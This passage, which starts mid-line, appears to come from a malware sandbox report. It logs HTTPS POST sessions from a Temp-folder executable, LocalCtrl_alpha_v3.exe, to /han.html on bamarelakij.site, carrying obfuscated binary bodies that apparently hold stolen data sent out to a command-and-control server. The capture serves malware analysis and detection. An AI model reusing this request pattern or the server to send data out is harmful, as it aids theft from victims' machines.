cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1642&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1274&delivery_rate=1642294&cwnd=181&unsent_bytes=0&cid=95a61734dd2e835c&ts=333&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	50092	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:36 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 380 Host: bamarelakij.site
2025-01-09 13:56:36 UTC	380	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16 Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
2025-01-09 13:56:37 UTC	795	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:37 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Adt8Q4dFe2xa14vWToiHnO6AmIJD8K6KVoh0U%2Brp52ECAsDE5JWtKJQvEFUcZzNrAP%2BoLAWdeT6f9szs9o4OZvKBKA639Uxbwo080IR4eEjaNbXaASj4Frj92vbR%2Bi6ZR48j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee821bb58cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1883&rtt_var=710&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1442&delivery_rate=1550716&cwnd=218&unsent_bytes=0&cid=8e384ea2e82ad4bb&ts=330&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	50093	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:38 UTC	428	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 78289 Host: bamarelakij.site
2025-01-09 13:56:38 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 96 31 01 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 31 98 80 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab ec 8e 95 5c ff ff ff ff ff ff ff ff 8d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 21 27 a0 a3 a6 a3 a9 28 26 a7 17 32 b7 b1 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 21 27 a0 a3 a6 a3 a9 28 26 a7 a8 27 a5 26 2b a8 ab ac ac ab ac a3 22 2a 27 a4 24 24 28 a9 a3 a5 ac 21 27 21 27 a3 23 a9 2d a3 ac ac 23 aa 2b 27 a9 a7 ac 2a a0 a6 2d 28 a7 a4 a7 a5 a6 23 23 ab 22 25 a4 ac a1 25 a3 2a ab 2d a9 a6 2c a0 22 21 a9 25 22 a2 a5 22 2a 28 2c 22 2b ac 21 a4 Data Ascii: 1R:h6@5Y4`H14(\9119.2.!'(&2<!'(&'&+"'$$(!'!'#-#+'-(##"%%-,"!%""(,"+!
2025-01-09 13:56:38 UTC	15331	OUT	Data Raw: a9 23 a1 21 a8 2a 24 a1 23 ac 2d a3 a9 2b 2b a0 aa 28 26 a8 a2 26 29 ab 26 2c 29 a1 2d a9 aa a9 23 aa 21 a1 a7 29 a1 ab a6 25 28 aa 27 24 2a a2 a2 ac a7 22 a9 23 a3 25 23 2a 22 2d 26 26 2c a6 a8 ac a6 a4 24 a4 2d 2c a7 ac a3 a0 21 a4 a0 ab ac a9 21 ab 26 a0 25 a9 a1 a5 21 ab a3 25 21 2b a6 a6 25 a5 21 a5 26 aa 24 aa 26 25 a4 aa 24 a8 2c a4 2c a2 a9 a0 aa 2a 27 2b 2b 2d 27 a5 a6 a4 2b a4 a7 24 28 28 a8 a0 ab 2a a8 a9 a2 24 2a a8 a6 a4 ab 27 28 29 2d 29 a2 2a 2c 2d 24 29 a3 ab a7 2a a3 a4 a2 24 a1 a1 a9 a3 a4 aa a1 a5 a1 a4 23 a1 a8 28 2a a0 25 a7 23 a1 a4 a6 ac a9 a6 a1 a7 28 a3 a0 a9 a2 a2 ac a1 27 a8 26 2c a1 27 29 a0 28 a8 aa a9 a8 2c 2a ab 28 a5 28 ac a1 a8 2c 28 a2 a1 a4 2a 29 29 a5 ac 27 a1 2d 21 a3 aa 24 21 22 a9 a9 a9 21 ac 2b 21 27 86 05 28 a5 81 Data Ascii: #!$#-++(&&)&,)-#!)%('$"#%#"-&&,$-,!!&%!%!+%!&$&%$,,'++-'+$(($'()-),-$)$#(%#('&,')(,((,(*))'-!$!"!+!'(
2025-01-09 13:56:38 UTC	15331	OUT	Data Raw: 29 26 a6 a0 27 a9 27 2b 27 a0 ac 24 26 a2 27 a7 ab aa a2 2a 21 24 26 aa 26 aa 2c 26 22 aa a4 aa ab 24 22 2a a9 21 2a 2c ac a0 21 2d aa 28 a2 2b 27 aa 2a ac 22 a4 ac a7 ab 2c 2d a8 a8 ab 2d 2a a4 a5 24 29 a0 a1 a9 ab ac a4 26 2d a3 25 25 a0 ac 28 2c a9 ab 2b a0 25 a2 a0 a6 ab 29 ab aa ab a4 a7 a7 27 aa a3 a9 a7 ab 2a 27 ab 2b a4 26 21 2a 29 ac ab 2c 28 a9 a3 a3 25 ac a2 2a 2a a8 a4 a1 a1 2a a8 a6 a7 a7 29 a9 2d a2 27 28 aa 26 21 a2 a8 a7 21 a9 27 22 ab 25 24 23 a3 2d a7 2c a0 ac 29 a6 29 2a a1 a8 a0 a3 2d 23 a5 26 2a 2c a8 25 a1 a5 a5 a5 25 2a 2c 29 a4 a4 2b 21 ac a9 ab 29 23 23 a9 22 ab 26 a0 ab a2 2b 2d 27 23 2b 25 a4 ac a0 a5 a3 a7 23 a4 a5 a3 a5 28 a0 26 ac a5 26 aa a9 23 aa 2d 27 2c 21 2a 2a a3 25 a8 a0 29 26 25 26 a2 28 27 a6 aa 28 2d 21 24 aa 23 a2 Data Ascii: )&''+'$&'!$&&,&"$"!,!-(+'",--$)&-%%(,+%)''+&!),(%*)-'(&!!'"%$#-,))-#&,%%,)+!)##"&+-'#+%#(&&#-',!**%)&%&('(-!$#
2025-01-09 13:56:38 UTC	15331	OUT	Data Raw: ac aa ab 23 a9 a7 23 a3 a8 a1 23 21 23 2d 24 a8 a6 22 ab 29 a5 28 23 2b 27 28 22 a3 a8 22 a0 2c ac ab 28 a8 a2 27 ac 28 2b a1 a5 28 25 2a 24 a0 a7 2c 29 26 2b a6 27 23 a4 a7 25 21 2b 23 ab a0 27 21 a1 a7 2a 21 a2 27 2a 23 2b a8 2d a1 23 21 23 22 21 a6 a8 aa 24 a1 a1 a1 24 a6 a6 a8 aa a7 ab a9 21 a1 2d ac a0 a1 2b a1 27 25 23 a8 a5 aa a1 a7 a6 24 a3 2b 27 a3 a3 2b 22 a0 a1 aa 24 a6 aa ac 26 25 2d a8 a0 a5 aa 27 a6 a4 a9 a4 29 29 2d ab 22 a5 21 a5 a9 a1 28 a8 a2 2d 25 21 24 ac a7 2d 2d a0 2c 25 2b 21 24 28 23 2d 27 22 2c 2b 24 a3 ab 24 27 a9 2b ab a6 ac 2d ab 29 2b a4 22 2a aa a1 a2 a7 28 2d 2d 29 22 2b 24 2a 2d a5 ab 24 a0 2a 26 aa 24 21 22 25 a9 22 ab 26 a1 2c a8 27 2c a7 ab ac aa 22 a8 a3 2d 25 a5 a1 a0 2c 22 2a a4 2b 2c 2a 21 a1 a8 ac 24 22 a5 a1 a0 a0 Data Ascii: ###!#-$")(#+'("",('(+(%$,)&+'#%!+#'!!'#+-#!#"!$$!-+'%#$+'+"$&%-'))-"!(-%!$--,%+!$(#-'",+$$'+-)+"(--)"+$-$&$!"%"&,',"-%,"+,!$"
2025-01-09 13:56:38 UTC	15331	OUT	Data Raw: 2b 2a 2d a5 27 23 26 17 3c 36 b9 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a9 aa a0 2b 2a 2d a5 27 23 26 28 22 aa a4 a5 a4 28 a9 a8 25 22 2b a3 a0 28 a3 2c a5 22 a7 24 ac 24 27 a7 ab 24 26 2a aa ac 24 aa 21 28 2d 27 a0 a3 24 2c ab a9 29 a3 a2 26 27 2a 2a 26 ab a9 a7 2b a5 24 21 a5 a8 a2 a5 a3 a2 27 a6 a8 22 23 aa ac a8 a2 23 28 aa a6 23 2b a3 23 24 27 24 21 a2 ac a0 a0 25 2b 24 a9 a4 ac 26 a9 26 a3 2b 2d a9 a9 a5 ac 27 a2 23 a7 25 a3 25 2c 28 ab a1 a3 2c a7 21 29 2d 2b 2c 22 ab 22 22 a5 a5 26 22 a3 ab 2b 26 27 a1 a6 a7 25 a5 21 a9 21 ac 23 a6 2a a5 a4 26 2d a7 a7 27 a2 a3 26 2d ab a7 29 aa 27 a7 2a 2c 25 27 a7 2a a3 2c a8 2a aa 21 a7 2c a2 23 24 2b a4 a1 27 27 ac ac 24 a6 29 a3 a1 26 2a 2d 26 ab a8 a7 22 a0 2a ac 25 2d Data Ascii: +-'#&<6<+-'#&("(%"+(,"$$'$&$!(-'$,)&'&+$!'"##(#+#$'$!%+$&&+-'#%%,(,!)-+,"""&"+&'%!!#&-'&-)',%',!,#$+''$)&-&"*%-
2025-01-09 13:56:38 UTC	1634	OUT	Data Raw: 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab ec 8e 95 5c ff ff ff ff ff ff ff ff 8d 00 0e 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a3 39 b0 31 31 b2 39 97 32 b7 b1 b9 97 21 27 a0 a3 a6 a3 a9 28 26 a7 17 35 38 b3 80 00 0c 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 ba c7 00 00 00 00 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab a0 6c ae 6e ff ff ff ff ff ff ff ff 93 00 0e 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a3 39 b0 31 31 b2 39 97 32 b7 b1 b9 97 21 27 a0 a3 a6 a3 a9 28 26 a7 97 a2 23 a7 ac 23 21 a7 26 2c a0 17 3c 36 b9 3c 80 00 0c 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 d0 86 80 00 00 00 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab 3a fc 71 a7 ff ff ff ff ff ff ff ff 92 00 0e 00 00 00 00 00 00 00 00 Data Ascii: (\91192!'(&58(ln91192!'(&##!&,<6<(:q
2025-01-09 13:56:38 UTC	806	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:38 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GkqhTjkvZwnb9ff7ktrjC7a9d2%2F9HUGzqTDzmwqp%2F7yuM6YX%2Bpd0lT3YtCHXR04JlYCfoab7rMR473oY6eHk33F6k3Fq%2FdKj%2Fg%2FgWIBnn%2B8oYKOBh40qi8Y7ZxDROIkVqtEQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee8ae85443f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=613&sent=40&recv=86&lost=0&retrans=0&sent_bytes=2838&recv_bytes=79573&delivery_rate=1761158&cwnd=217&unsent_bytes=0&cid=699f702eb052a57e&ts=698&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	50094	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:39 UTC	428	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 68909 Host: bamarelakij.site
2025-01-09 13:56:39 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 f2 0c 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 49 06 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 99 18 19 1a 9c 1a 52 31 39 b7 b5 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 eb 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9 17 Data Ascii: R!f%@5YIa3`SR19%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;
2025-01-09 13:56:39 UTC	15331	OUT	Data Raw: 0b 68 63 1f 44 d6 17 2d 3d 7e 71 f9 cd 59 bc 93 d3 ea 2d 3f 63 ea d2 fb dd d3 0e 9c cd b5 e9 ae 68 3e 1f fb 96 d0 d7 f5 0e e0 8c eb c8 05 26 ab 77 4f 1e 38 66 b6 ee 86 bd 78 b6 f3 a9 b4 42 a7 4e 50 4e b1 bf a8 f3 e1 e1 00 16 e5 a8 d9 d9 dc 4e 87 37 25 de c9 52 2e e7 5d 07 6a 7a 5b 2c ef 33 08 fb 76 77 6d 6c b2 57 5b ee ab e3 8b e3 c3 28 eb 1b f4 e0 2b ff 5e ab 7e 5f 9a 42 7f d3 ae 67 c7 c3 af 62 ff 87 22 7f cd 61 48 a8 4b 61 b0 7f d6 0a b9 b8 ca 7c b4 4c 79 a5 83 de 68 f3 0e d3 58 7a 7f 81 81 3f 76 89 bf ed d2 64 f5 88 af a7 9c db ea 49 5d 52 62 63 7b e3 e2 53 18 5a 78 b7 bd 4c bf a5 f3 43 9c 9f d4 13 26 02 7c 87 69 f4 3e fb 7d c0 08 7c 68 9f d3 7e c3 b8 6c af 4a 6b af 1b 91 df f7 2e df 1d 20 f6 99 e7 e3 37 fc 48 2d 79 60 6e 0e 56 1d 39 94 b5 ee 3b 34 4c Data Ascii: hcD-=~qY-?ch>&wO8fxBNPNN7%R.]jz[,3vwmlW[(+^~_Bgb"aHKa\|LyhXz?vdI]Rbc{SZxLC&\|i>}\|h~lJk. 7H-y`nV9;4L
2025-01-09 13:56:39 UTC	15331	OUT	Data Raw: 3b c4 e1 49 19 a3 be ca 81 bd 94 ab 5c b9 00 5f ea 3e 8b 35 c4 47 b5 83 73 43 ba c1 88 08 46 b5 ef 89 a8 b5 56 ef d3 a8 b5 65 24 18 13 87 5b e4 d0 16 7c 9e 6f 13 61 86 7a f2 6f e7 18 73 1c 8e 2a e4 f8 4d f3 1f e6 7a 60 10 ba 66 4f bf d0 53 ff 26 b0 85 06 50 fc fd fe 4e 88 2b 8d c0 f5 7a d1 5d a4 a1 64 a9 f1 3d 37 c5 ad e7 d8 81 5f 3b d2 5e 4e 43 fd 60 2a 5f a3 e7 92 59 fc 33 9f e2 b7 12 4c 3e a4 75 59 39 45 dd b8 4b 1e 41 c2 8e 52 1c b5 eb 78 09 84 bc 33 ac f7 7e fa b8 d2 42 cd a2 65 73 eb d3 c1 e9 0d 46 f4 56 3a 21 7e a6 45 93 e6 52 69 71 95 85 42 e8 34 50 7b ea 8b 3c eb 1a 0d 2c 5e a9 8e 58 35 98 bf 69 e8 6a 52 dc 5b 33 8f c6 5d ac b2 5d 4d 95 de 0a e5 6d af 8c 0d 46 ff 98 9d 64 b1 4a 5f 54 dc 96 a9 c6 84 b2 3f 5b ac 65 22 e6 af f0 b2 e7 d3 2b 8a 68 a8 Data Ascii: ;I\_>5GsCFVe$[\|oazosMz`fOS&PN+z]d=7_;^NC`_Y3L>uY9EKARx3~BesFV:!~ERiqB4P{<,^X5ijR[3]]MmFdJ_T?[e"+h
2025-01-09 13:56:39 UTC	15331	OUT	Data Raw: cf be a6 a9 96 4e ed c4 48 66 d5 28 f5 cb 66 d5 98 77 4f 43 a7 8c 98 f4 ec 93 0a 06 52 de be 28 2a 8c 3e 35 67 bc 92 ef 9c cc 19 62 77 8a b8 59 a6 90 cc 97 c4 bc a1 6f 8d bd 0d 7c 0d e3 7e 48 47 d0 da 1d ac 69 2c a8 78 c8 79 8a 99 59 bb 47 37 be 90 b8 a8 31 bd dc f2 04 30 f3 28 41 25 4f 11 41 e4 11 f9 b1 88 4b 9d 9f 6c 65 39 a6 a3 14 7f 91 eb 22 1c b6 28 d0 f7 56 ac 7a 2f 37 c0 3a 3f bf 3b 3e 50 fc 38 54 6f cd 67 97 ac 59 73 4e 81 39 11 4b d1 fa 14 4b 11 0f ac 70 82 9a 0d 54 b9 17 29 67 b8 47 8f 61 94 52 4f 52 9b 97 05 37 dc bc ad 9e 7f 4b db f3 fb 53 d8 53 b4 07 ed bd cd 92 ef 2f a4 9d b3 5d 8a 5a cf 54 5e 88 18 69 86 f9 d5 1b 39 bf 5f 08 de 48 15 5a cb f5 f7 d5 ac 0e 47 15 e7 8d 78 1f 23 81 63 c1 1f 06 b7 15 92 62 22 d3 7a aa 17 c7 e8 02 0a 64 fa 0e be Data Ascii: NHf(fwOCR(*>5gbwYo\|~HGi,xyYG710(A%OAKle9"(Vz/7:?;>P8TogYsN9KKpT)gGaROR7KSS/]ZT^i9_HZGx#cb"zd
2025-01-09 13:56:39 UTC	7585	OUT	Data Raw: 44 64 13 14 18 3f bb 53 46 df 3f 54 6a a4 d5 e6 e6 5a 1f a0 b1 dd 12 12 1b 35 cf c0 8d 86 68 c7 0c 1c d2 d8 12 f0 ab 0c 63 1c e8 1f 91 31 b0 f0 d6 cb ad 77 0e d7 49 1c d5 90 f5 9c 6a de 8f 3b ab ec 42 2f b0 4d 11 4e 8f 3f 19 8c c6 05 b5 b8 35 cd 6d ed d5 79 8e 07 d5 05 04 5f 57 dc ce 7c 9c 78 5f de 08 2f c8 8e 61 05 9a 07 2e 9c e5 b5 af 75 1e 9d 1d ee a0 77 7d e0 53 5b eb aa 03 fd 57 c2 ce 36 54 aa 76 50 65 39 86 3b 24 b7 82 3e eb 27 c8 58 19 99 c6 a2 81 46 fe ba f9 ed ce 46 11 6d 58 0a e5 6c 39 03 2b 86 ac 79 ca 2c 20 ab bb 45 cd 5a e0 73 65 42 98 e5 f0 44 42 c0 ac 21 c9 d6 a0 45 e5 42 cb 25 c0 7f 31 71 95 db 34 65 ab ae fb 4f 2d d0 45 4d 3e a1 a1 9c d7 ac 62 28 6f e9 13 09 30 dc 2d 97 db aa 99 7b 8e 8c 2f a6 ea b7 02 3d 78 1e f4 9e f6 99 23 b3 23 ef a7 Data Ascii: Dd?SF?TjZ5hc1wIj;B/MN?5my_W\|x_/a.uw}S[W6TvPe9;$>'XFFmXl9+y, EZseBDB!EB%1q4eO-EM>b(o0-{/=x##
2025-01-09 13:56:40 UTC	801	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:40 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hu8Y%2BeT1TwO7kH518TKWaGjhGzUBAbiAFx%2FzYxApDmjSbrn9rt9tHeCBJVClOD%2F5qIJuUUynJPCi5a0RqWStRQ7p9RlllH1wznKHHGDxhC9%2FdebSHbT9J8v5kupq%2BUPrfVvt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee955daf0ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1600&rtt_var=611&sent=28&recv=77&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70149&delivery_rate=1773997&cwnd=32&unsent_bytes=0&cid=2b9b7bd327be2d54&ts=618&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	50095	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:41 UTC	425	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 35 Host: bamarelakij.site
2025-01-09 13:56:41 UTC	35	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:56:41 UTC	737	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:41 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOqUEgn%2FTRc896044h510OYpizKiztoGSNlHhcsl6NPEqIrFpYfkH5Ps%2B94QLIJ%2Fhds6b6lmZs9Hnk3P%2BGHAmsy4q4I1S83iGXeFkzULl7Wo%2FSC%2FMda0ww%2BouOgSy80Zf1qd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee9fada38c75-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30243&min_rtt=2018&rtt_var=17610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1096&delivery_rate=1446977&cwnd=195&unsent_bytes=0&cid=6b729107771df766&ts=477&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	50096	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:56 UTC	429	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 684831 Host: bamarelakij.site
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 1c 0a 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 81 81 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 99 a1 1d 2e aa b9 b2 39 b9 2e 31 39 b7 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 9d a1 1d 2e aa b9 b2 39 b9 2e 31 39 b7 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0 ec 98 Data Ascii: }R@5Y`HIL`HS49.9.19.88":.&6.6.49.9":`H"36:.9.19.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 39 31 18 2c 37 b0 2b 95 b2 a0 35 b9 b3 a0 21 bb b6 31 a6 18 27 1a b5 a1 3c a8 ba 19 a3 31 b7 9b 39 b1 bc ac 95 33 25 a3 a1 21 31 ba a9 32 24 35 95 27 b1 b6 2d b7 31 9a a3 97 9a 99 99 28 2d 21 a9 39 b3 a0 2c 3d 18 23 a5 b5 38 ba 37 25 9a ba 38 9b aa 38 a2 37 27 b6 a7 a1 ba ac a7 bc b1 b8 21 39 25 a5 95 b6 a3 bb 2d 2d 28 bb a7 1a 1c 1a b2 b9 a3 2b a6 b0 95 22 18 99 a0 18 99 25 a8 3b a7 3c aa a4 b6 21 b0 2b 24 39 a5 31 31 ac 21 19 aa 35 34 23 a3 21 33 31 a3 18 25 24 a0 99 35 b3 b3 a5 39 a0 99 a0 aa b6 a7 a8 bb b7 ba 1a a3 b0 3d 21 9c 3c 3d ba b9 97 1c 9a 24 b6 18 a4 97 31 b2 24 3a a9 3a 1a a6 b7 a9 3b a8 bb 33 a7 3d 25 9a 95 a5 a9 a5 33 a9 29 9c 3a ac b6 3d 22 1a b0 2b 3a 98 19 a5 36 2b b0 b2 1c a1 3a 3a 2b a7 a6 a4 a2 2b a8 1b 24 b8 39 b9 29 3d 9a 34 97 b1 Data Ascii: 91,7+5!1'<193%!12$5'-1(-!9,=#87%887'!9%--(+"%;<!+$911!54#!31%$59=!<=$1$::;3=%3):="+:6+::++$9)=4
